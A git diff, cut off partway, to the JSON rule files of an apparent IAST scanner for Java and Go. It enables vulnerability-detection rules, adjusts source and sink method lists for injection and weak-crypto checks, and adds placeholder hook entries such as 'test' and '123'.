2867 insertions(+), 867 deletions(-) diff --git a/static/data/go_full_policy.json b/static/data/go_full_policy.json index 70157f70a..14a0f0206 100644 --- a/static/data/go_full_policy.json +++ b/static/data/go_full_policy.json @@ -88,7 +88,7 @@ "value": "template.(*Template).ExecuteTemplate()" } ], - "enable": 0, + "enable": 1, "type": 4, "value": "reflected-xss" }, diff --git a/static/data/go_hooktype.json b/static/data/go_hooktype.json index 6d432a170..7f6d62657 100644 --- a/static/data/go_hooktype.json +++ b/static/data/go_hooktype.json @@ -1,4 +1,70 @@ [ + { + "created_by": 1, + "enable": 1, + "language": 4, + "name": "1", + "name_en": null, + "name_zh": "1", + "system_type": 0, + "type": 3, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 4, + "name": "1", + "name_en": null, + "name_zh": "1", + "system_type": 0, + "type": 4, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 4, + "name": "123", + "name_en": null, + "name_zh": "123", + "system_type": 0, + "type": 3, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 4, + "name": "123", + "name_en": null, + "name_zh": "123", + "system_type": 0, + "type": 4, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 4, + "name": "3", + "name_en": null, + "name_zh": "3", + "system_type": 0, + "type": 3, + "value": "3" + }, + { + "created_by": 1, + "enable": 1, + "language": 4, + "name": "3", + "name_en": null, + "name_zh": "3", + "system_type": 0, + "type": 4, + "value": "3" + }, { "created_by": 1, "enable": 1, @@ -69,9 +135,9 @@ "created_by": 1, "enable": 1, "language": 4, - "name": "\u547d\u4ee4\u6267\u884c ", + "name": "\u547d\u4ee4\u6267\u884c123", "name_en": "OS Command Injection", - "name_zh": "\u547d\u4ee4\u6267\u884c ", + "name_zh": "\u547d\u4ee4\u6267\u884c123", "system_type": 1, "type": 4, "value": "cmd-injection" @@ -340,6 +406,28 @@ "type": 4, "value": "ssrf" }, + { + "created_by": 1, + "enable": 1, + "language": 4, + "name": "test", + "name_en": null, + "name_zh": "test", + "system_type": 0, + "type": 3, + "value": "test" + }, + { + "created_by": 1, + "enable": 1, + "language": 4, + "name": "test", + "name_en": null, + "name_zh": "test", + "system_type": 0, + "type": 4, + "value": "test" + }, { "created_by": 1, "enable": 1, diff --git a/static/data/go_policy.json b/static/data/go_policy.json index 4635fa029..0c7a1c797 100644 --- a/static/data/go_policy.json +++ b/static/data/go_policy.json @@ -52,6 +52,26 @@ "type": 4, "value": "path-traversal" }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P3", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "template.(*Template).ExecuteTemplate()" + } + ], + "enable": 1, + "type": 4, + "value": "reflected-xss" + }, { "details": [ { diff --git a/static/data/java_full_policy.json b/static/data/java_full_policy.json index 01c97275c..599c2beef 100644 --- a/static/data/java_full_policy.json +++ b/static/data/java_full_policy.json @@ -2790,11 +2790,15 @@ "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [], + "tags": [ + "custom-encoded-cmd-injection" + ], "target": "O", "track": "false", "type": 1, - "untags": [], + "untags": [ + "custom-decoded-cmd-injection" + ], "value": "java.lang.StringBuilder.delete(int,int)" }, { @@ -2952,11 +2956,15 @@ "source": "O|P3", "stack_blacklist": [], "system_type": 1, - "tags": [], + "tags": [ + "custom-decoded-cmd-injection" + ], "target": "O", "track": "false", "type": 1, - "untags": [], + "untags": [ + "custom-decoded-cmd-injection" + ], "value": "java.lang.StringBuilder.replace(int,int,java.lang.String)" }, { @@ -5225,11 +5233,15 @@ "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [], + "tags": [ + "custom-decoded-cmd-injection" + ], "target": "R", "track": "false", "type": 1, - "untags": [], + "untags": [ + "custom-encoded-cmd-injection" + ], "value": "com.fasterxml.jackson.core.JsonParser.getCurrentName()" }, { @@ -6381,7 +6393,7 @@ "value": "org.glassfish.grizzly.http.Cookie.setSecure(boolean)" } ], - "enable": 0, + "enable": 1, "type": 4, "value": "cookie-flags-missing" }, @@ -6448,7 +6460,7 @@ "value": "javax.crypto.Cipher.getInstance(java.lang.String,java.security.Provider)" } ], - "enable": 0, + "enable": 1, "type": 4, "value": "crypto-bad-ciphers" }, @@ -6549,7 +6561,7 @@ "value": "java.security.MessageDigest.getInstance(java.lang.String,java.security.Provider)" } ], - "enable": 0, + "enable": 1, "type": 4, "value": "crypto-bad-mac" }, @@ -6839,7 +6851,7 @@ "value": "org.apache.commons.lang.RandomStringUtils.randomNumeric(int)" } ], - "enable": 0, + "enable": 1, "type": 4, "value": "crypto-weak-randomness" }, @@ -11774,7 +11786,8 @@ "source": "P1", "stack_blacklist": [ "org.springframework.web.util.UriComponentsBuilder.fromOriginHeader", - "org.springframework.web.util.UriComponentsBuilder.fromUriString" + "org.springframework.web.util.UriComponentsBuilder.fromUriString", + "java.lang.String.replaceAll" ], "system_type": 1, "tags": [], @@ -11793,7 +11806,9 @@ "inherit": "false", "language": 1, "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "java.lang.String.replaceAll" + ], "system_type": 1, "tags": [], "target": "", @@ -12604,7 +12619,7 @@ "value": "org.springframework.http.converter.StringHttpMessageConverter.writeInternal(java.lang.String,org.springframework.http.HttpOutputMessage)" } ], - "enable": 0, + "enable": 1, "type": 4, "value": "reflected-xss" }, @@ -13193,7 +13208,7 @@ "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], "value": "org.springframework.cloud.config.server.resource.ResourceController.retrieve(java.lang.String,java.lang.String,java.lang.String,java.lang.String,boolean)" @@ -14670,7 +14685,7 @@ "value": "play.mvc.Http$Session.put(java.lang.String,java.lang.String)" } ], - "enable": 0, + "enable": 1, "type": 4, "value": "trust-boundary-violation" }, @@ -15453,7 +15468,7 @@ "command": "", "created_by": 1, "enable": 1, - "ignore_blacklist": false, + "ignore_blacklist": true, "ignore_internal": false, "inherit": "false", "language": 1, @@ -15462,7 +15477,7 @@ "system_type": 1, "tags": [], "target": "O", - "track": "", + "track": "false", "type": 1, "untags": [], "value": "org.xml.sax.InputSource.(java.io.Reader)" diff --git a/static/data/java_hooktype.json b/static/data/java_hooktype.json index b7c62ec15..ebf709326 100644 --- a/static/data/java_hooktype.json +++ b/static/data/java_hooktype.json @@ -1,4 +1,114 @@ [ + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "1", + "name_en": null, + "name_zh": "1", + "system_type": 0, + "type": 3, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "1", + "name_en": null, + "name_zh": "1", + "system_type": 0, + "type": 4, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "1", + "name_en": null, + "name_zh": "1", + "system_type": 0, + "type": 2, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "123", + "name_en": null, + "name_zh": "123", + "system_type": 0, + "type": 3, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "123", + "name_en": null, + "name_zh": "123", + "system_type": 0, + "type": 4, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "11", + "name_en": null, + "name_zh": "11", + "system_type": 0, + "type": 2, + "value": "11" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "22", + "name_en": null, + "name_zh": "22", + "system_type": 0, + "type": 2, + "value": "22" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "3", + "name_en": null, + "name_zh": "3", + "system_type": 0, + "type": 3, + "value": "3" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "3", + "name_en": null, + "name_zh": "3", + "system_type": 0, + "type": 4, + "value": "3" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "656", + "name_en": null, + "name_zh": "656", + "system_type": 0, + "type": 2, + "value": "6556" + }, { "created_by": 1, "enable": 1, @@ -432,9 +542,9 @@ "created_by": 1, "enable": 1, "language": 1, - "name": "\u547d\u4ee4\u6267\u884c ", + "name": "\u547d\u4ee4\u6267\u884c123", "name_en": "OS Command Injection", - "name_zh": "\u547d\u4ee4\u6267\u884c ", + "name_zh": "\u547d\u4ee4\u6267\u884c123", "system_type": 1, "type": 4, "value": "cmd-injection" @@ -813,6 +923,28 @@ "type": 4, "value": "path-traversal" }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "w", + "name_en": null, + "name_zh": "w", + "system_type": 0, + "type": 2, + "value": "q" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "qqq", + "name_en": null, + "name_zh": "qqq", + "system_type": 0, + "type": 2, + "value": "qq" + }, { "created_by": 1, "enable": 1, @@ -967,6 +1099,28 @@ "type": 4, "value": "ssrf" }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "test", + "name_en": null, + "name_zh": "test", + "system_type": 0, + "type": 3, + "value": "test" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "test", + "name_en": null, + "name_zh": "test", + "system_type": 0, + "type": 4, + "value": "test" + }, { "created_by": 1, "enable": 1, @@ -1033,6 +1187,17 @@ "type": 4, "value": "unvalidated-redirect" }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "w", + "name_en": null, + "name_zh": "w", + "system_type": 0, + "type": 2, + "value": "ww" + }, { "created_by": 1, "enable": 1, diff --git a/static/data/java_policy.json b/static/data/java_policy.json index 67ff3652d..0a76d0a24 100644 --- a/static/data/java_policy.json +++ b/static/data/java_policy.json @@ -2066,10 +2066,14 @@ "inherit": "false", "source": "O", "stack_blacklist": [], - "tags": [], + "tags": [ + "custom-encoded-cmd-injection" + ], "target": "O", "track": "false", - "untags": [], + "untags": [ + "custom-decoded-cmd-injection" + ], "value": "java.lang.StringBuilder.delete(int,int)" }, { @@ -2183,10 +2187,14 @@ "inherit": "false", "source": "O|P3", "stack_blacklist": [], - "tags": [], + "tags": [ + "custom-decoded-cmd-injection" + ], "target": "O", "track": "false", - "untags": [], + "untags": [ + "custom-decoded-cmd-injection" + ], "value": "java.lang.StringBuilder.replace(int,int,java.lang.String)" }, { @@ -3876,10 +3884,14 @@ "inherit": "all", "source": "O", "stack_blacklist": [], - "tags": [], + "tags": [ + "custom-decoded-cmd-injection" + ], "target": "R", "track": "false", - "untags": [], + "untags": [ + "custom-encoded-cmd-injection" + ], "value": "com.fasterxml.jackson.core.JsonParser.getCurrentName()" }, { @@ -4663,6 +4675,45 @@ }, { "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.http.Cookie.setSecure(boolean)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P9", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "false", + "untags": [], + "value": "javax.ws.rs.core.NewCookie.(java.lang.String,java.lang.String,java.lang.String,java.lang.String,int,java.lang.String,int,java.util.Date,boolean,boolean)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P5", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "false", + "untags": [], + "value": "javax.ws.rs.core.NewCookie.(javax.ws.rs.core.Cookie,java.lang.String,int,java.util.Date,boolean,boolean)" + }, { "command": "", "ignore_blacklist": false, @@ -4671,15 +4722,15 @@ "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", + "target": "", "track": "false", "untags": [], - "value": "org.iast.springsec.common.DataManager.doManage(java.lang.String)" + "value": "org.glassfish.grizzly.http.Cookie.setSecure(boolean)" } ], "enable": 1, - "type": 1, - "value": "custom-encrypt" + "type": 4, + "value": "cookie-flags-missing" }, { "details": [ @@ -4688,31 +4739,50 @@ "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P2", + "source": "P1", + "stack_blacklist": [ + "com.ibm.ejs.util.am._Alarm.run", + "com.ibm.crypto.provider.PKCS12KeyStore.engineLoad", + "util.StateUtils.encrypt" + ], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.crypto.Cipher.getInstance(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "false", "untags": [], - "value": "java.lang.ClassLoader.loadLibrary(java.lang.Class,java.lang.String,boolean)" + "value": "javax.crypto.Cipher.getInstance(java.lang.String,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P2", - "stack_blacklist": [], + "source": "P1", + "stack_blacklist": [ + "com.ca.siteminder" + ], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.lang.Runtime.load0(java.lang.Class,java.lang.String)" + "value": "javax.crypto.Cipher.getInstance(java.lang.String,java.security.Provider)" } ], "enable": 1, "type": 4, - "value": "dynamic-library-load" + "value": "crypto-bad-ciphers" }, { "details": [ @@ -4720,275 +4790,356 @@ "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "com.mysql.jdbc", + "org.skife.jdbi.v2.Query", + "com.amazonaws.services.s3.AmazonS3Client.putObject", + "com.ibm.crypto.provider.PKCS12KeyStore.engineLoad", + "com.ibm.ws.security.ltpa.LTPAToken2.getBytes", + "com.ibm.ws.ssl.channel.impl.SSLUtils.handleHandshake", + "com.jcraft.jsch.Session.connect", + "com.microsoft.sqlserver.jdbc.TDSChannel.enableSS", + "com.newrelic.agent", + "com.compuware.apm.agent", + "asset.pipeline.AssetPipeline.serveUncompiledAsset", + "controllers.AssetsBuilder", + "JITCompiler", + "java.security.SecureRandom", + "java.util.jar.JarVerifier", + "javax.crypto.JarVerifier", + "jakarta.crypto.JarVerifier", + "maybeNotModified", + "oracle.jdbc.driver", + "java.security.Signature.initVerify", + "oracle.jdbc.xa.client.OracleXADataSource.getXAConnection", + "org.eclipse.jetty.io.ssl.SslConnection", + "org.springframework.web.client.RestTemplate", + "org.thymeleaf.spring4.view.ThymeleafView.render", + "play.api.libs.Codecs$", + "play.api.mvc.CookieBaker", + "play.router.RoutesCompiler", + "play.PlaySourceGenerators", + "sbt.compiler", + "sbt.inc.Stamp", + "org.jets3t.service.utils.ServiceUtils.signWithHmacSha1", + "org.jboss.resteasy.spi.ResteasyDeployment.start" + ], "tags": [], "target": "", "track": "true", "untags": [], - "value": "jakarta.el.ELProcessor.eval(java.lang.String)" + "value": "java.security.MessageDigest.getInstance(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "java.security.SecureRandom", + "java.util.jar.JarVerifier", + "com.microsoft.sqlserver.jdbc.TDSChannel.enableSS" + ], "tags": [], "target": "", "track": "true", "untags": [], - "value": "jakarta.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" + "value": "java.security.MessageDigest.getInstance(java.lang.String,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "java.security.SecureRandom", + "java.util.jar.JarVerifier" + ], "tags": [], "target": "", "track": "true", "untags": [], - "value": "jakarta.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" - }, + "value": "java.security.MessageDigest.getInstance(java.lang.String,java.security.Provider)" + } + ], + "enable": 1, + "type": 4, + "value": "crypto-bad-mac" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "jakarta.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" + "value": "java.lang.Math.random()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "jakarta.el.ExpressionFactory.createMethodExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" + "value": "java.util.Random.nextBoolean()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "jakarta.el.ExpressionFactory.createValueExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class)" + "value": "java.util.Random.nextBytes(byte[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "jakarta.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,jakarta.servlet.jsp.el.VariableResolver,jakarta.servlet.jsp.el.FunctionMapper)" + "value": "java.util.Random.nextDouble()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], + "inherit": "false", + "source": "O", + "stack_blacklist": [ + "weblogic.work.IncrementAdvisor.run" + ], "tags": [], "target": "", "track": "true", "untags": [], - "value": "javax.el.ELProcessor.eval(java.lang.String)" + "value": "java.util.Random.nextFloat()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "javax.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" + "value": "java.util.Random.nextGaussian()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], + "inherit": "false", + "source": "O", + "stack_blacklist": [ + "com.google.gson.JsonObject", + "java.util.Hashtable" + ], "tags": [], "target": "", "track": "true", "untags": [], - "value": "javax.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" + "value": "java.util.Random.nextInt()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", - "stack_blacklist": [], + "inherit": "false", + "source": "O", + "stack_blacklist": [ + "getRandomSample", + "java.util.Hashtable", + "NullSafeConcurrentHashMap", + "org.apache.tomcat.websocket.WsWebSocketContainer.generateWsKeyValue", + "org.quartz.core.QuartzSchedulerThread.getRandomizedIdleWaitTime", + "SelectableConcurrentHashMap", + "net.bytebuddy.utility.RandomString.nextString" + ], "tags": [], "target": "", "track": "true", "untags": [], - "value": "javax.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" + "value": "java.util.Random.nextInt(int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "javax.el.ExpressionFactory.createMethodExpression(javax.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" + "value": "java.util.Random.nextLong()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "javax.el.ExpressionFactory.createValueExpression(javax.el.ELContext,java.lang.String,java.lang.Class)" + "value": "org.apache.commons.lang.RandomStringUtils.random(int,int,int,boolean,boolean)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "javax.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,javax.servlet.jsp.el.VariableResolver,javax.servlet.jsp.el.FunctionMapper)" + "value": "org.apache.commons.lang.RandomStringUtils.random(int,int,int,boolean,boolean,char[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object)" + "value": "org.apache.commons.lang.RandomStringUtils.randomAlphabetic(int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object,java.lang.Class)" + "value": "org.apache.commons.lang.RandomStringUtils.randomAlphanumeric(int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object)" + "value": "org.apache.commons.lang.RandomStringUtils.randomAscii(int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object,java.lang.Class)" - }, + "value": "org.apache.commons.lang.RandomStringUtils.randomNumeric(int)" + } + ], + "enable": 1, + "type": 4, + "value": "crypto-weak-randomness" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object)" - }, + "value": "org.iast.springsec.common.DataManager.doManage(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "custom-encrypt" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", - "track": "true", + "track": "false", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object,java.lang.Class)" + "value": "java.lang.ClassLoader.loadLibrary(java.lang.Class,java.lang.String,boolean)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object)" - }, + "value": "java.lang.Runtime.load0(java.lang.Class,java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "dynamic-library-load" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, @@ -5000,7 +5151,7 @@ "target": "", "track": "true", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object,java.lang.Class)" + "value": "jakarta.el.ELProcessor.eval(java.lang.String)" }, { "command": "", @@ -5013,7 +5164,7 @@ "target": "", "track": "true", "untags": [], - "value": "ognl.Ognl.parseExpression(java.lang.String)" + "value": "jakarta.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" }, { "command": "", @@ -5026,163 +5177,163 @@ "target": "", "track": "true", "untags": [], - "value": "org.apache.commons.ognl.Ognl.parseExpression(java.lang.String)" + "value": "jakarta.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValue()" + "value": "jakarta.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValue(java.lang.Class)" + "value": "jakarta.el.ExpressionFactory.createMethodExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValue(java.lang.Object)" + "value": "jakarta.el.ExpressionFactory.createValueExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValue(java.lang.Object,java.lang.Class)" + "value": "jakarta.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,jakarta.servlet.jsp.el.VariableResolver,jakarta.servlet.jsp.el.FunctionMapper)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext)" + "value": "javax.el.ELProcessor.eval(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Class)" + "value": "javax.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object)" + "value": "javax.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object,java.lang.Class)" + "value": "javax.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor()" + "value": "javax.el.ExpressionFactory.createMethodExpression(javax.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor(java.lang.Object)" + "value": "javax.el.ExpressionFactory.createValueExpression(javax.el.ELContext,java.lang.String,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext)" + "value": "javax.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,javax.servlet.jsp.el.VariableResolver,javax.servlet.jsp.el.FunctionMapper)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext,java.lang.Object)" + "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object)" }, { "command": "", @@ -5195,359 +5346,359 @@ "target": "", "track": "true", "untags": [], - "value": "org.thymeleaf.standard.expression.Expression.parse(java.lang.String)" + "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P2", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.thymeleaf.standard.expression.IStandardExpressionParser.parseExpression(org.thymeleaf.context.IExpressionContext,java.lang.String)" - } - ], - "enable": 1, - "type": 4, - "value": "expression-language-injection" - }, - { - "details": [ + "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.apache.commons.fileupload.FileItem.getName()" + "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.springframework.web.multipart.MultipartFile.getName()" + "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - 